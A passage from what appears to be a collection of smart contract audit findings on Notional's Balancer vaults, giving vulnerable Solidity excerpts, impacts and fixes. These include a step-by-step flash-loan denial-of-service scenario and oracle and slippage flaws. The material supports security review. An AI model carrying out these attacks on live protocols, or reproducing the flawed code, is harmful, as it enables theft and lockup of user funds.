vaultState[\"totalStrategyTokens\"] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py . [100%]\\n\\n========================================================================================== 1 passed, 1 warning in 4.31s ===========================================================================================\\n```\\nчUpdate the `SettlementUtils._decodeParamsAndValidate` function to revert if the slippage is set to zero.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n// Remove the line below\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n// Add the line below\\n if (callbackData.oracleSlippagePercent == 0 || callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nAppendix I - Normal and Post Maturity Vault Settlement\\nThe `settlementSlippageLimitPercent` and `postMaturitySettlementSlippageLimitPercent` of the vault are set to 5% and 10% respectively per the environment file provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n \"settlementSlippageLimitPercent\": 5e6, # 5%\\n \"postMaturitySettlementSlippageLimitPercent\": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultNormal` or `settleVaultPostMaturity` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraVault.sol\\n function settleVaultNormal(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external {\\n if (maturity <= block.timestamp) {\\n revert Errors.PostMaturitySettlement();\\n }\\n if (block.timestamp < maturity - SETTLEMENT_PERIOD_IN_SECONDS) {\\n revert Errors.NotInSettlementWindow();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastSettlementTimestamp,\\n context.baseStrategy.vaultSettings.settlementCoolDownInMinutes\\n );\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.settlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastSettlementTimestamp = uint32(block.timestamp);\\n context.baseStrategy.vaultState.setStrategyVaultState();\\n }\\n\\n function settleVaultPostMaturity(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external onlyNotionalOwner {\\n if (block.timestamp < maturity) {\\n revert Errors.HasNotMatured();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp,\\n context.baseStrategy.vaultSettings.postMaturitySettlementCoolDownInMinutes\\n );\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.postMaturitySettlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp = uint32(block.timestamp); \\n context.baseStrategy.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nSince the same vulnerable `SettlementUtils._decodeParamsAndValidate` function is being used here, the `settleVaultNormal` and `settleVaultPostMaturity` functions are affected by this issue too.чMalicious users can trigger the permissionless `settleVaultEmergency` function and cause the trade to suffer huge slippage. This results in loss of assets for the vaults and their users.ч```\\nFile: BalancerEnvironment.py\\n \"postMaturitySettlementSlippageLimitPercent\": 10e6, # 10%\\n \"emergencySettlementSlippageLimitPercent\": 10e6, # 10%\\n```\\n -Rely On Balancer Oracle Which Is Not Updated FrequentlyчmediumчThe vault relies on Balancer Oracle which is not updated frequently.\\nNote: This issue affects the MetaStable2 balancer leverage vault\\nThe issue is that this pool only handled ~1.5 transactions per day based on the last 5 days' data. In terms of average, the price will only be updated once every 16 hours. There are also many days that there is only 1 transaction. The following shows the number of transactions for each day within the audit period.\\n5 Oct 2022 - 3 transactions\\n4 Oct 2022 - 1 transaction\\n3 Oct 2022 - 1 transaction\\n2 Oct 2022 - 2 transactions\\n1 Oct 2022 - 1 transaction\\nNote that the price will only be updated whenever a transaction (e.g. swap) within the Balancer pool is triggered. Due to the lack of updates, the price provided by Balancer Oracle will not reflect the true value of the assets. Considering the stETH/ETH Balancer pool, the price of the stETH or ETH provided will not reflect the true value in the market.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n (BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n\\n```\\nFile: BalancerUtils.sol\\n function _getTimeWeightedOraclePrice(\\n address pool,\\n IPriceOracle.Variable variable,\\n uint256 secs\\n ) internal view returns (uint256) {\\n IPriceOracle.OracleAverageQuery[]\\n memory queries = new IPriceOracle.OracleAverageQuery[](1);\\n\\n queries[0].variable = variable;\\n queries[0].secs = secs;\\n queries[0].ago = 0; // now\\n\\n // Gets the balancer time weighted average price denominated in the first token\\n return IPriceOracle(pool).getTimeWeightedAverage(queries)[0];\\n }\\n```\\nчAlthough it is not possible to obtain a price pair that truly reflects the true value of an asset in the real world, the vault should attempt to minimize inaccuracy and slippage as much as possible. This can be done by choosing and using a more accurate Oracle that is updated more frequently instead of using the Balancer Oracle that is infrequently updated.\\nChainlink should be used as the primary Oracle for price pair. If a secondary Oracle is needed for a price pair, consider using Teller Oracle instead of Balancer Oracle. Some example of how Chainlink and Tellor works together in a live protocol can be found here\\nObtaining the time-weight average price of BTP LP token from Balancer Oracle is fine as the Balancer pool is the source of truth. However, getting the price of ETH or stETH from Balancer Oracle would not be a good option.\\nOn a side note, it was observed that the weightage of the price pair is Balancer Oracle - 60% and Chainlink - 40%. Thus, this theoretically will reduce the impact of inaccurate prices provided by Balancer Oracle by around half. However, the team should still consider using a better Oracle as almost all the functions within the vault depends on the accurate price of underlying assets to operate.\\nNote: For the stETH/ETH balancer leverage vault, the price pair is computed based on a weighted average of Balancer Oracle and Chainlink. Based on the test script, the weightage is Balancer Oracle - 60% and Chainlink - 40%.\\n```\\nFile: BalancerEnvironment.py\\n \"maxRewardTradeSlippageLimitPercent\": 5e6,\\n \"balancerOracleWeight\": 0.6e4, # 60%\\n \"settlementCoolDownInMinutes\": 60 * 6, # 6 hour settlement cooldown\\n```\\nчThe price provided by the function will not reflect the true value of the assets. It might be overvalued or undervalued. The affected function is being used in almost all functions within the vault. For instance, this function is part of the critical `_convertStrategyToUnderlying` function that computes the value of the strategy token in terms of its underlying assets. As a result, it might cause the following:\\nVault Settlement - Vault settlement requires computing the underlying value of the strategy tokens. It involves dealing with a large number of assets, and thus even a slight slippage in the price will be significantly amplified.\\nDeleverage/Liquidation of Account - If the price provided does not reflect the true value, users whose debt ratio is close to the liquidation threshold might be pre-maturely deleveraged/liquidated since their total asset value might be undervalued.\\nBorrowing - If the price provided does not reflect the true value, it might be possible that the assets of some users might be overvalued, and thus they are able to over-borrow from the vault.ч```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n (BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n -Attackers Can DOS Balancer Vaults By Bypassing The BPT ThresholdчmediumчMalicious users can lock up all the leverage vaults offered by Notional causing denial-of-service by bypassing the BPT threshold and subseqently trigger an emergency settlement against the vaults.\\nThe current BPT threshold is set to 20% of the total BTP supply based on the environment file provided during the audit.\\n```\\nFile: BalancerEnvironment.py\\n \"oracleWindowInSeconds\": 3600,\\n \"maxBalancerPoolShare\": 2e3, # 20%\\n \"settlementSlippageLimitPercent\": 5e6, # 5%\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply) \\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\n\\nWhen the total number of BPT owned by the vault exceeds the BPT threshold, no one will be able to enter the vault as per the require check at Line 295-296 within the `TwoTokenPoolUtils._joinPoolAndStake` function.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _joinPoolAndStake(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n uint256 minBPT\\n ) internal returns (uint256 bptMinted) {\\n // prettier-ignore\\n PoolParams memory poolParams = poolContext._getPoolParams( \\n primaryAmount, \\n secondaryAmount,\\n true // isJoin\\n );\\n\\n bptMinted = BalancerUtils._joinPoolExactTokensIn({\\n context: poolContext.basePool,\\n params: poolParams,\\n minBPT: minBPT\\n });\\n\\n // Check BPT threshold to make sure our share of the pool is\\n // below maxBalancerPoolShare\\n uint256 bptThreshold = strategyContext.vaultSettings._bptThreshold(\\n poolContext.basePool.pool.totalSupply()\\n );\\n uint256 bptHeldAfterJoin = strategyContext.totalBPTHeld + bptMinted;\\n if (bptHeldAfterJoin > bptThreshold)\\n revert Errors.BalancerPoolShareTooHigh(bptHeldAfterJoin, bptThreshold);\\n\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n }\\n```\\n\\nAnother key point that is critical for this issue is that when the total number of BPT owned by the vault exceeds the BPT threshold, an emergency settlement can be triggered against the vault and anyone can triggered it as it is permissionless. A major side-effect of an emergency settlement is that the vault will be locked up after the emergency settlement. No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens. The reason is that after the emergency settlement, there will be some asset cash balance in the vault and this will cause no one to be able to enter the vault due to the require check at Line 218. This side-effect has been verified by reviewing the codebase and clarifying with the sponsors.\\n```\\nFile: VaultState.sol\\n function enterMaturity(\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n VaultConfig memory vaultConfig,\\n uint256 strategyTokenDeposit,\\n uint256 additionalUnderlyingExternal,\\n bytes calldata vaultData\\n ) internal returns (uint256 strategyTokensAdded) {\\n // If the vault state is holding asset cash this would mean that there is some sort of emergency de-risking\\n // event or the vault is in the process of settling debts. In both cases, we do not allow accounts to enter\\n // the vault.\\n require(vaultState.totalAssetCash == 0);\\n```\\n\\nIf an attacker could force an emergency settlement on a vault anytime, he would be able to perform a DOS on the vault since the vault will basically be locked up after it. The following demonstrates how this can be performed:\\nAssume that the total supply of BTP in the WETH/stETH Balancer Pool is 100,000 Therefore, the BPT threshold of the vault will be 20,000.\\nAssume that the total number of BPT held by the vault is 19,900.\\nNote that under normal circumstances, it is not possible for the users to exceed the BPT threshold because the transaction will revert if the `bptHeldAfterJoin > bptThreshold` after the user enters the vault.\\nNote that at this point, the emergency settlement CANNOT be triggered against the vault because the vault has not exceeded BPT threshold yet\\nBob (attacker) flash-loans a large amount of ETH from dydx where the fee is almost non-existence (1 Wei Only)\\nBob allocates a portion of his ETH to join the WETH/stETH Balancer Pool. This will cause the total supply of BPT to increase significantly to 200,000.\\nBob allocates a portion of his ETH to enter the vault and causes the total number of BPT held by the vault to increase by 150 from 19,900 to 20,050. This is allowed because the total supply of BPT has increased to 200,000, and thus the BPT threshold has increased to 40,000. Also, Bob does not leverage himself and does not borrow from Notional since the flash loan already provided him with access to a large number of funds, and thus he does not need to pay for any borrowing cost to minimize the cost of this attack.\\nAt this point, due to the inflow of 150 BPT to the Balancer Pool, the total supply of BPT increase from 200,000 to 200,150.\\nAfter entering the vault, Bob exits the WETH/stETH Balancer Pool entirely with all his 100,000 BPT position. This will cause the total supply of BPT to fall back to 100,150. Per my research, there is no exit fee when a Liquidity Provider exits a pool. Also, a Liquidity Provider only suffers a loss due to impermanent loss. However, since all these steps are executed within the same transaction, there is no impermanent loss because no one perform any token swap. Thus, there is no cost incurred by Bob for this step.\\nNote that at this point, the emergency settlement CAN be triggered against the vault because the vault has exceeded the BPT threshold. The total number of BPT held by the vault is 20,050, and the BPT threshold is 20,030 (=100,150 * 0.2).\\nAnyone can trigger the emergency settlement as it is permissionless. Bob triggered an emergency settlement against the vault, and 20 BPT will be sold off in the market so that the vault will not exceed the BPT threshold. It is important to ensure that the number of BPTs to be sold is kept as low as possible so that the total value of the vault will not be reduced by slippage during the trade. This is because Bob still owns the shares of the vault and he wants to get back as much of his original deposit as possible later. This value can be optimized further with Math.\\nAs mentioned earlier, after an emergency settlement, the vault will be locked up. No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens.\\nBob proceeds to redeem all his shares from the vault. He will get back all of his deposits minus the 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders which is insignificant. Note that the Notional's leverage vault does not impose any exit fee.\\nBob proceeds to repay back his loan and pay 1 wei as the fee to dydx.\\nThe cost of attack is 1 wei (flash-loan fee) + 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders, which is insignificant. The slippage loss during emergency settlement can be minimized by causing the total number of BPT held by the vault to exceed the BPT threshold by the smallest possible value.\\nAll the above steps will be executed within a single block/transaction.чShort term, consider the following measures to mitigate the issue:\\nThe emergency settlement function is permissionless and can be called by anyone. It is recommended to implement access control to ensure that this function can only be triggered by Notional.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. If the user entered the vault in this block, he/she could only exit at the next block.\\nLong term, update the implementation of the vault so that the vault will not be locked up after an emergency settlement. After selling off the excess BPT, the vault should allow users to enter the vault as per normal.чMalicious users can lock up all the leverage vaults offered by Notional causing denial-of-service. This results in a loss of funds for the protocol as the vault is no longer generating profit for the protocol, and also a loss of funds for vault users as they cannot realize the profits because they are forced to exit the vault prematurely.\\nThe following are various reasons why someone would want to perform a DOS on Notional vaults:\\nDamage the reputation of Notional, and reduce users' trust in Notional\\nA competitor who is also offering a leverage vault attempts to bring down Notional\\nSomeone who shorted Notional's protocol tokenч```\\nFile: BalancerEnvironment.py\\n \"oracleWindowInSeconds\": 3600,\\n \"maxBalancerPoolShare\": 2e3, # 20%\\n \"settlementSlippageLimitPercent\": 5e6, # 5%\\n```\\n -Corruptible Upgradability PatternчmediumчStorage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during an upgrade.\\nFollowing are the inheritance of the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nNote: The contracts highlighted in Orange mean that there are no gap slots defined. The contracts highlighted in Green mean that gap slots have been defined\\nInheritance of the MetaStable2TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nInheritance of the Boosted3TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n Boosted3TokenAuraVault-->Boosted3TokenPoolMixin:::nogap\\n Boosted3TokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nThe Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults are meant to be upgradeable. However, it inherits contracts that are not upgrade-safe.\\nThe gap storage has been implemented on the `BaseStrategyVault` and `BalancerStrategyBase` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n}\\n```\\n\\n```\\nabstract contract BalancerStrategyBase is BaseStrategyVault, UUPSUpgradeable {\\n /** Immutables */\\n uint32 internal immutable SETTLEMENT_PERIOD_IN_SECONDS;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[100] private __gap;\\n}\\n```\\n\\nHowever, no gap storage is implemented on the `Boosted3TokenPoolMixin`, `MetaStable2TokenVaultMixin`, `TwoTokenPoolMixin`, `PoolMixin`, `AuraStakingMixin` and `BalancerOracleMixin` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nThus, adding new storage variables to any of these inherited contracts can potentially overwrite the beginning of the storage layout of the child contract. causing critical misbehaviors in the system.чConsider defining an appropriate storage gap in each upgradeable parent contract at the end of all the storage variable definitions as follows:\\n```\\nuint256[50] __gap; // gap to reserve storage in the contract for future variable additions\\n```\\n\\nReference\\nA similar issue was found in the past audit report:чStorage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during upgrading, thus causing the vaults to be broken and assets to be stuck.ч```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n -Did Not Approve To Zero FirstчmediumчAllowance was not set to zero first before changing the allowance.\\nSome ERC20 tokens (like USDT) do not work when changing the allowance from an existing non-zero allowance value. For example Tether (USDT)'s `approve()` function will revert if the current approval is not zero, to protect against front-running changes of approvals.\\nThe following attempt to call the `approve()` function without setting the allowance to zero first.\\n```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n\\nHowever, if the token involved is an ERC20 token that does not work when changing the allowance from an existing non-zero allowance value, it will break a number of key functions or features of the protocol as the `TokenUtils.checkApprove` function is utilised extensively within the vault as shown below.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _approveBalancerTokens(TwoTokenPoolContext memory poolContext, address bptSpender) internal {\\n IERC20(poolContext.primaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n IERC20(poolContext.secondaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n // Allow BPT spender to pull BALANCER_POOL_TOKEN\\n IERC20(address(poolContext.basePool.pool)).checkApprove(bptSpender, type(uint256).max);\\n }\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _approveBalancerTokens(ThreeTokenPoolContext memory poolContext, address bptSpender) internal {\\n poolContext.basePool._approveBalancerTokens(bptSpender);\\n\\n IERC20(poolContext.tertiaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n\\n // For boosted pools, the tokens inside pool context are AaveLinearPool tokens.\\n // So, we need to approve the _underlyingToken (primary borrow currency) for trading.\\n IBoostedPool underlyingPool = IBoostedPool(poolContext.basePool.primaryToken);\\n address primaryUnderlyingAddress = BalancerUtils.getTokenAddress(underlyingPool.getMainToken());\\n IERC20(primaryUnderlyingAddress).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n }\\n```\\n\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n IERC20(trade.sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n IERC20(buyToken).checkApprove(address(Deployments.WRAPPED_STETH), amountBought);\\n uint256 wrappedAmount = Deployments.WRAPPED_STETH.balanceOf(address(this));\\n /// @notice the amount returned by wrap is not always accurate for some reason\\n Deployments.WRAPPED_STETH.wrap(amountBought);\\n amountBought = Deployments.WRAPPED_STETH.balanceOf(address(this)) - wrappedAmount;\\n```\\nчIt is recommended to set the allowance to zero before increasing the allowance and use safeApprove/safeIncreaseAllowance.чA number of features within the vaults will not work if the `approve` function reverts.ч```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n -`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`чmediumч`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`\\nWhen `enterVault` in `VaultAccountAction.sol` is called, the first function that is called is `requireValidAccount`. This function checks to ensure that the passed-in `account` parameter is not a system-level `account` address:\\n```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n\\nWith the above checks, `requireValidAccount` ensures that any Notional system-level account cannot enter a vault. However, `deleverageAccount` in `VaultAccountAction.sol` allows liquidators to transfer vault shares from a liquidated account into their own account. In the case that a liquidator is not already entered into a vault, then `deleverageAccount` will instantiate a vault account for them (using _transferLiquidatorProfits) before depositing the liquidated account's vault shares into the newly-instantiated account. This effectively circumvents the `requireValidAccount` check in `enterVault`.чConsider updating the `require` statement in `_transferLiquidatorProfits` to the following:\\n```\\nrequire(liquidator.maturity == maturity, \"Vault Shares Mismatch\"); // dev: has vault shares\\n```\\n\\nRemoving the option of allowing addresses that do not have a maturity in the respective vault to receive shares and therefore implicitly enter a vault prevents Notional system accounts from being able to enter into vaults.чAny address that would otherwise be restricted from entering vaults via the `requireValidAccount` check would be able to circumvent that function using `deleverageAccount`. I assume these system-level accounts are restricted from entering vaults as they have access to internal Notional state and are used across the protocol, so having them be able to enter vaults could negatively impact Notional.\\nAssuming that all the relevant Notional system accounts are smart contracts that do not allow arbitrary calls, then having any of the system accounts themselves trigger this issue is infeasible. However, as a result of another issue it is possible for a vault to force an arbitrary address to deleverage accounts, which could be used to force a Notional system account to enter into a vault.ч```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n -No Validation Check Against Decimal Of Secondary TokenчmediumчThere is no validation check against the decimal of the secondary token due to a typo. Thus, this will cause the vault to be broken entirely or the value of the shares to be stuck if a secondary token with more than 18 decimals is added.\\nThere is a typo in Line 65 within the `TwoTokenPoolMixin` contract. The validation at Line 65 should perform a check against the `secondaryDecimals` instead of the `primaryDecimals`. As such, no validation was performed against the secondary token.\\n```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n\\nIf the decimal of the secondary tokens is more than 18, the `Stable2TokenOracleMath._getSpotPrice` will stop working as the code will revert in Line 24 below because the decimal of secondary tokens is more than 18.\\nWhen the `Stable2TokenOracleMath._getSpotPrice` function stop working, the vaults will be broken entirely because the settle vault and reinvest rewards functions will stop working too. This is because the settle vault and reinvest rewards functions will call the `Stable2TokenOracleMath._getSpotPrice` function internally, resulting in a revert.\\n```\\nFile: 